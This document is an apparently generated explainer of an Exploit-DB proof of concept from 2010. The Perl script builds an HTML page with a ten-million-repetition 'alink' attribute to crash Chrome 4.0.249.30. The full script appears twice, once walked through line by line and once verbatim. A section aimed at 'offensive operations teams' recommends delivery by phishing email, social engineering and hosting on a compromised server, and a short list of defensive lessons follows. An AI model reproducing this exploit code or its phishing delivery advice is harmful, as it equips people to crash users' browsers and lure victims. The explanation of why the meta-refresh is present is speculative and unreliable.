Google Chrome 4.0.249.30 Denial of Service (PoC) Explained

What this paper is

This paper is a Proof-of-Concept (PoC) exploit for a Denial of Service (DoS) vulnerability in Google Chrome version 4.0.249.30. It demonstrates how to trigger a crash in the browser by creating a specially crafted HTML file. The PoC aims to show that Chrome, unlike other browsers, mishandles a specific scenario that leads to instability.

Simple technical breakdown

The exploit works by creating an HTML file (poc.html). This file contains a meta-refresh tag that attempts to redirect the browser to http://www.google.com after 1 second. Crucially, it also defines the alink attribute of the <body> tag with an extremely long string of 'a' characters (10 million of them). This excessive length is what triggers the vulnerability, causing the browser to crash.

Complete code and payload walkthrough

The provided code is a Perl script that generates the malicious HTML file.

#!/usr/bin/perl
#google chrome 4.0.249.30 DoS PoC
#
#
#Author: Anonymous
#
#Info: In ordinary cases browser would redirect to "http://www.google.com"
#but in this case browser will report error for something that should
#be possible and is possible on other browsers.
#
#
#
#I would like to thank Jeremy Brown who made very nice fuzzer for browser
#
#
#
#
#
#
#
#Ipak lik nije tolika seljacina koliko sam mislio da je, jer mu pdf fuzzer malo suxa


$file="poc.html";
$poc='a/' x 10000000;
open(myfile,">>$file");
print myfile '<head><meta http-equiv="refresh" content="1; url=http://www.google.com"></head>';
print myfile "<body alink=";
print myfile $poc;
print myfile '">';
close(myfile);
print "Finished\n";

Let's break down each meaningful part:

• #!/usr/bin/perl: This is the shebang line, indicating that the script should be executed using the Perl interpreter.
• #google chrome 4.0.249.30 DoS PoC: A comment identifying the target software and vulnerability type.
• #Author: Anonymous: Identifies the author of the PoC.
• #Info: ...: Explains the intended behavior and the vulnerability's nature – that Chrome reports an error for something other browsers handle.
• #I would like to thank Jeremy Brown who made very nice fuzzer for browser: Acknowledges another individual for their contribution to fuzzing tools.
• #Ipak lik nije tolika seljacina koliko sam mislio da je, jer mu pdf fuzzer malo suxa: This appears to be a non-English comment, likely a personal remark. Its technical relevance is unknown.
• $file="poc.html";: Declares a variable $file and assigns it the string "poc.html". This will be the name of the generated HTML file.
  • Practical Purpose: Defines the output filename for the exploit.
• $poc='a/' x 10000000;: Declares a variable $poc and assigns it a string created by repeating the sequence 'a/' ten million times.
  • Practical Purpose: This is the core of the exploit payload. The extremely long string is designed to overflow or exhaust a buffer or processing limit within Chrome's rendering engine when handling the alink attribute.
• open(myfile,">>$file");: Opens the file specified by $file ("poc.html") in append mode (>>). If the file doesn't exist, it will be created. The file handle is assigned to myfile.
  • Practical Purpose: Prepares the output file for writing the HTML content.
• print myfile '<head><meta http-equiv="refresh" content="1; url=http://www.google.com"></head>';: Writes the HTML <head> section to the file. This includes a meta-refresh tag that instructs the browser to redirect to http://www.google.com after 1 second.
  • Practical Purpose: This part sets up a seemingly normal browser behavior (redirection) which is intended to mask the actual exploit payload that follows. It also provides a potential avenue for the browser to attempt processing the malformed attribute.
• print myfile "<body alink=";: Writes the opening of the <body> tag, including the alink attribute name, to the file.
  • Practical Purpose: Starts the HTML body tag and prepares to insert the malformed alink attribute value.
• print myfile $poc;: Writes the content of the $poc variable (the 10 million 'a/' characters) to the file. This is the malformed data that triggers the DoS.
  • Practical Purpose: Inserts the exploit payload into the alink attribute.
• print myfile '">';: Writes the closing quote and the closing angle bracket for the <body> tag to the file.
  • Practical Purpose: Completes the malformed <body> tag.
• close(myfile);: Closes the file handle myfile, ensuring all buffered data is written to the file.
  • Practical Purpose: Finalizes the creation of the poc.html file.
• print "Finished\n";: Prints a confirmation message to the console indicating the script has completed its execution.
  • Practical Purpose: Provides user feedback that the PoC file has been generated.

Mapping list:

• #!/usr/bin/perl: Script interpreter directive.
• $file="poc.html";: Output filename definition.
• $poc='a/' x 10000000;: Exploit payload generation (excessively long string).
• open(myfile,">>$file");: File opening for writing.
• print myfile '<head>...</head>';: HTML head with meta-refresh for redirection.
• print myfile "<body alink=";: Start of the malformed body tag.
• print myfile $poc;: Insertion of the exploit payload into alink.
• print myfile '">';: Closing of the malformed body tag.
• close(myfile);: File closing.
• print "Finished\n";: Script completion message.

Practical details for offensive operations teams

• Required Access Level: No elevated privileges are required on the target system. The exploit is delivered via a web page that the user must interact with.
• Lab Preconditions:
  • A target machine with Google Chrome version 4.0.249.30 installed.
  • A web server (e.g., Python's SimpleHTTPServer, Apache, Nginx) to host the generated poc.html file.
  • The Perl interpreter installed on the attacker's machine to run the PoC script.
• Tooling Assumptions:
  • Perl interpreter for script execution.
  • A simple web server for hosting the HTML.
  • A way to deliver the URL of the hosted HTML file to the target user (e.g., email, chat).
• Execution Pitfalls:
  • Browser Version Specificity: This exploit is highly specific to Chrome 4.0.249.30. Newer versions or even minor patches would likely not be vulnerable.
  • User Interaction: The target user must open the poc.html file in the vulnerable Chrome version. This could be by directly opening the file or by visiting a URL that serves the file.
  • Network Access: The target must be able to access the web server hosting the poc.html file.
  • File Size: The generated poc.html file will be very large (approximately 20MB due to the 10 million repetitions of 'a/'). This could be a minor indicator or cause issues with some delivery mechanisms.
  • Crash vs. Hang: While described as DoS, the outcome might be a full crash, a browser hang, or an error dialog, depending on the exact rendering engine state at the time.
• Tradecraft Considerations:
  • Delivery: Phishing emails with a link to the hosted HTML are a common vector. Social engineering to convince the user to click the link is crucial.
  • Stealth: The Perl script itself is not malicious and runs locally. The malicious artifact is the HTML file. Hosting it on a compromised or dedicated server is standard.
  • Attribution: The PoC script is simple and doesn't contain obfuscation. The generated HTML is also straightforward.

Where this was used and when

This exploit was published on January 3, 2010. It targets Google Chrome 4.0.249.30, which was released around late 2009. Exploits of this nature, especially DoS PoCs, are often used for:

• Vulnerability Research: Demonstrating flaws to browser vendors or the security community.
• Educational Purposes: Teaching about specific vulnerability classes and how they are triggered.
• Early Stage Exploitation: In the early days of Chrome, such vulnerabilities might have been explored by various actors, though this specific PoC is presented as a demonstration rather than a tool for widespread attack.

It's unlikely this specific PoC was widely used in targeted attacks due to its specificity and the fact that it's a DoS, which is less valuable for persistent access than remote code execution. However, the underlying vulnerability type (handling of malformed attributes in HTML) could have been a building block for more complex exploits.

Defensive lessons for modern teams

• Keep Software Updated: The most critical defense is to ensure all software, especially web browsers, are kept up-to-date. Vulnerabilities like this are patched quickly. Chrome 4.0 is ancient.
• Input Validation and Sanitization: Browser rendering engines must rigorously validate and sanitize all HTML attributes and content. Handling excessively long strings or malformed data gracefully is paramount.
• Fuzzing: Continuous fuzzing of browser components, especially parsers and rendering engines, is essential for discovering such issues before they are exploited. The paper itself acknowledges the use of a fuzzer.
• Resource Limits: Implement robust resource limits for rendering processes to prevent a single malformed element from consuming excessive memory or CPU, leading to a DoS.
• Security Audits: Regular security audits and code reviews of browser components can help identify potential weaknesses.

ASCII visual (if applicable)

This PoC is a client-side exploit that relies on the browser rendering an HTML file. A visual representation of the process:

+-----------------+      +-----------------+      +-----------------+
| Attacker's      |      | Web Server      |      | Target Machine  |
| Machine         |      |                 |      | (Chrome 4.0)    |
| (Perl Script)   |      |                 |      |                 |
+-----------------+      +-----------------+      +-----------------+
        |                       |                        |
        | 1. Run Perl script    |                        |
        |    (generates poc.html)|                        |
        |---------------------->|                        |
        |                       | 2. Host poc.html       |
        |                       |----------------------->|
        |                       |                        |
        |                       |                        | 3. User clicks link
        |                       |                        |    (poc.html loaded)
        |                       |                        |--------------------->
        |                       |                        | 4. Browser attempts
        |                       |                        |    to render HTML
        |                       |                        |    (malformed alink)
        |                       |                        |--------------------->
        |                       |                        | 5. Crash / DoS
        |                       |                        |

Source references

• Paper ID: 10960
• Paper Title: Google Chrome 4.0.249.30 - Denial of Service (PoC)
• Author: anonymous
• Published: 2010-01-03
• Keywords: Multiple,dos
• Paper URL: https://www.exploit-db.com/papers/10960
• Raw URL: https://www.exploit-db.com/raw/10960

Original Exploit-DB Content (Verbatim)

#!/usr/bin/perl
#google chrome 4.0.249.30 DoS PoC
#
#
#Author: Anonymous
#
#Info: In ordinary cases browser would redirect to "http://www.google.com" 
#but in this case browser will report error for something that should 
#be possible and is possible on other browsers.
#
#
#
#I would like to thank Jeremy Brown who made very nice fuzzer for browser
#
#
#
#
#
#
#
#Ipak lik nije tolika seljacina koliko sam mislio da je, jer mu pdf fuzzer malo suxa


$file="poc.html";
$poc='a/' x 10000000;
open(myfile,">>$file");
print myfile '<head><meta http-equiv="refresh" content="1; url=http://www.google.com"></head>';
print myfile "<body alink=";
print myfile $poc;
print myfile '">';
close(myfile);
print "Finished\n";